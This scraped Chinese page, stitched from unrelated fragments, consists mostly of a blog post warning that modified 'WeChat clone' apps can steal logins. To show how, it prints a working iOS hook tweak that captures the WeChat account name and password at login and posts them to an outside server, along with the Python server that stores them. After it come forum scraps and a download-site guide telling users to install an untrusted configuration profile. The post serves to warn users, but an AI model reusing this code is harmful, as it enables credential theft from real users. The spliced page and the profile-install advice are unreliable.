微信分身版是否安全_百度知道最近微信分身版各种疯传，不少人都安装了不同功能的微信分身版，不管是一键转发，一键评论还是带有其它功能的微信分身版。
&&&&&&& 很显然很多人安装了这些分身版却不知道其中可能存在的风险，这些微信分身版无非就是通过load command动态库注入hook函数进行篡改，虽然你的手机没有越狱，但是安装了微信分身版后，你所用微信的所有信息都暴露在别人的面前了。包括获取你的微信账号密码，聊天记录等等，所有的信息。
&&&&&&& 下面笔者就从如何获取微信账号密码并传到指定服务器做一个简单的分析，看完这个后，你安装的分身版微信很可能就已经收集你的微信账号和密码。
首先进入微信登录界面，查看ViewController的继承关系：
[[[UIWindow keyWindow] rootViewController] _printHierarchy]
&MMUINavigationController 0×&, state: appeared, view: &UILayoutContainerView 0x17f33790&
&&&&&&&&&&&&&& | &WCAccountLoginLastUserViewController 0x18b52600&, state: appeared, view: &UIView 0x&
&&&&&&& 可以得到当前的ViewController为WCAccountLoginLastUserViewController,跟踪该类。然后点击登录按钮，可以看到调用onNext方法。使用IDA进入里面分析，可以得知是WCAccountLoginControlLogic类来负责处理具体的登录逻辑。跟踪WCAccountLoginControlLogic可以发现登录的时候调用了
- (void)onLastUserLoginUserName:(NSString*) name Pwd:(NSString*) pwd{}
&&&&&&& 其中传的参数就是微信的账号和密码，现在演示一下如何拦截微信账号密码，并发送到指定服务器。
&&&&&&& 既然需要一个服务器来接受传输的数据，那么就使用python的BaseHTTPRequestHandler来搭建一个简单的服务器。
#!/usr/bin/env python&
# -*- conding:utf-8 -*-&
from&BaseHTTPServer&import&BaseHTTPRequestHandler,&HTTPServer
from&urlparse&import&urlparse,&parse_qs
DEFAULT_HOST&=&''&&
DEFAULT_PORT&=&8080&&
class&RequestHandler(BaseHTTPRequestHandler):
& &&def&do_GET(self):
& & & & params=parse_qs(urlparse(self.path).query)&&
& & & &&self.send_response(200)&&
& & & &&self.send_header('Content-type','text/html')&&
& & & &&self.end_headers()&&
& & & &&#获取账号密码
& & & & fread&=&open('./pwd.log','r')
& & & & lines&=&fread.readlines();
& & & & &#每隔2秒刷新一次
& & & & content&=&'&meta
http-equiv=&refresh& content=&2&&'
& & & &&for&line&in&lines:
& & & & & content&=&content+line+'&br&'
& & & &&# Send the message to browser &
& & & &&self.wfile.write(content)&&
& & & &&return&&
& &&def&do_POST(self):
& & & & params=parse_qs(urlparse(self.path).query)&&
& & & &&#保存账号密码
& & & & fwrite&=&open('./pwd.log','a+')
& & & & fwrite.write(&username=%s\n&&%
params['name'][0])
& & & & fwrite.write(&pwd=%s\n&&%
params['pwd'][0])
& & & & fwrite.close()
& & & &&self.send_response(200)&&
& & & &&self.end_headers()&&
& & & &&return&&
def&run_server():
& &&try: &
& & & & server_address=(DEFAULT_HOST,&DEFAULT_PORT)&&
& & & & server=&HTTPServer(server_address,RequestHandler)&&
& & & &&print&&HTTP
server started on port: %s&&% DEFAULT_PORT &
& & & & server.serve_forever()&&
& &&except&Exception,&err:
& & & &&print&&Error:%s&&%err
& &&except&KeyboardInterrupt:
& & & &&print&&Server
interrupted and is shutting down...&&&
& & & & server.socket.close()&&
if&__name__&==&&__main__&:
& & run_server()
&&&&&&& 好了，一个简单的服务器搭建好了，post用来接受从微信传过来的账号和密码信息并保存到本地文件，然后通过get不断去请求刷新获取的账号密码。
&&&&&&& 编写tweak拦截账号密码，并发送到刚刚搭建的服务器上：
%hook WCAccountLoginControlLogic
-&(void)onLastUserLoginUserName:(NSString*)&name
Pwd:(NSString*)&pwd{
& & NSMutableURLRequest&*request=[NSMutableURLRequest
requestWithURL:[NSURL
URLWithString:[NSString
stringWithFormat:@&http://192.168.1.100:8080?name=%@&pwd=%@&,name,pwd]]];
& &&[request setTimeoutInterval:30];
& &&[request setHTTPMethod:@&POST&];
& &&[NSURLConnection sendAsynchronousRequest:request
queue:[NSOperationQueue
mainQueue]
&& & & & & & & & & & & & & completionHandler:^(NSURLResponse&*respone,
& & & & & & & & & & & & & & & & & & & & & & & &
&& & & & & & & & & & & & & & & & & & & & & & & NSData&*data,
& & & & & & & & & & & & & & & & & & & & & & & &
&& & & & & & & & & & & & & & & & & & & & & & & NSError&*error)
&& & & & NSHTTPURLResponse*&httpResponse&=&(NSHTTPURLResponse*)respone;
&& & & &&if(httpResponse.statusCode&==&200){
&& & & & & & NSLog(@&send
pwd success!&);
&& & & &&}
&&&&&&& 重签名微信，生成一个在非越狱机器上运行的微信分身版，这个已经在上一篇文章中讲过。进入登录界面输入账号密码，每次输入账号密码就发把账号密码发送到我们搭建的服务器上面，然后在浏览器输入就能实时看到输入的账号密码是什么了。
&&&&&&& 上面只是一个简单的演示，当然实际的分身版不可能写的这么简单，一般都经过混淆和加密的，但是也就是说，一旦你安装了微信分身版，那么你微信上面所有的信息都可能被监控，导致隐私泄露。
&&&&&&& 从网上下了一个分身版的微信就在其中的dylib文件中发现了上传账号密码的代码&&&
所以即使你的手机没有越狱，也不要去网上下载微信分身版，也不要去第三方渠道下载应用，因为很可能你在第三方渠道下载的应用就是被篡改过的。
本文链接：
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：19271次
排名：千里之外
原创：20篇
转载：35篇
(3)(9)(16)(2)(11)(5)(1)(4)(1)(1)(2)(1)查看: 286|回复: 0
最后登录15/2/12注册时间12/5/16阅读权限50积分-10精华0帖子金币-15624 枚91币0 枚
钻石: 0 颗
人气: 0 次
金币: -15624 个
发表于 16/4/7 09:07:26
苹果5s怎样设置微信分身版来信息提醒
帖子永久地址：&<button type="submit" class="pn" onclick="setCopy('苹果5s怎样设置微信分身版来信息提醒\n/thread--1.html', '帖子地址已经复制到剪贴板您可以用快捷键 Ctrl + V 粘贴到 QQ、MSN 里。')">推荐给好友
GMT+8, 16/9/5 17:16
Powered by智能手机教程子分类您的位置： &
& 苹果IOS9系统微信分身版实现微信多开详细方法
苹果IOS9系统微信分身版实现微信多开详细方法
发表时间： 11:27:12|
大小：19.40MB
版本：1.0.0
这篇文章主要介绍了IOS9实现多开详细方法，需要的朋友可以参考下!对于广大中国人来说，升级iOS9之后很多人都有碰到微信闪退或是打不开的现象，碰到这种情况怎么办了，接下来小编就给分享几个实用的解决方法。无需越狱，并且支持所有的IOS9苹果系统手机。1，打开手机微信，右上角那个+号，添加朋友，选择最后面的公众号，然后癫，这是专门解决IOS9微信多开闪退打不开问题。2，进入癫文字公众号之后回复拿到下载地址，地址发到你然后点击地址从打开之后输入下载，下载完之后先不要打开3，点击进入手机，点击通用!微信多开是给予手机多一个微信，建议分开与两个微信使用，不要做违法的事情!4，进入之后选择最下面有个描述文件，一般人都不知道这个是什么东西，其实并不需要刻意知道他是什么，这是手机的授权设置来的，点进去就可以解决IOS9微信多开的问题了。5，打开描述文件之后可以看到有几行英文，有的一行，视手机而定的，找到chongqingkuilian那行英文就可以，点进去就会看到你下载好了的IOS9微信多开，然后点给予授权即可!注意事项微信多开是让你的手机多一个微信客户端!在癫文字还有以及其他的微信多开!
精心安卓软件
专业的单机游戏下载网站
() 打造不一样的 单机游戏下载基地